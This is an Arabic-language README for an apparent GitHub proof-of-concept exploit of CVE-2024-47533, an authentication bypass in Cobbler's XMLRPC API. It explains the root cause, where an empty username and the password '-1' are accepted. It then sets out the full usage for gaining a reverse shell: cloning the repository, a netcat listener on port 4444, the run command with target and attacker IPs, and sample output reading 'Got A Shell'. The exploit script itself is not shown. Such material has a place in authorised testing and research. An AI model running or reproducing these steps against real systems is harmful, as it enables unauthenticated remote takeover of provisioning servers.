
إثبات مفهوم الاستغلال لـ CVE-2024-47533، وهو تجاوز للمصادقة في واجهة برمجة تطبيقات XMLRPC الخاصة بـ Cobbler مما يؤدي إلى تنفيذ كود عن بُعد غير مصرح به وصدفة عكسية.
يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال الثغرة CVE-2024-47533،
وهو تجاوز تحقق خطير في واجهة Cobbler XMLRPC API يؤدي إلى تنفيذ أكواد عن بُعد بدون مصادقة (RCE).
يستغل هذا الإكسبلويت خلل طريقة login() في واجهة XMLRPC لتجاوز التحقق وحقن أمر شل عكسية عبر background_import().
هذه الأداة مخصصة للأغراض التعليمية والبحثية واختبار الاختراق المصرح به فقط.
لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار.
السبب الجذري:
utils.get_shared_secret() تعيد بشكل غير صحيح -1 بسبب سوء معالجة قراءة الملفات في الوضع الثنائي مع ترميز، مما يسمح بالمصادقة باسم مستخدم فارغ وكلمة مرور -1.
التأثير:
يمكن للمهاجم:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
على جهاز المهاجم:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
مثال:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # سكريبت استغلال الشل العكسية
└── README.md # التوثيق
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
ملف GitHub الشخصي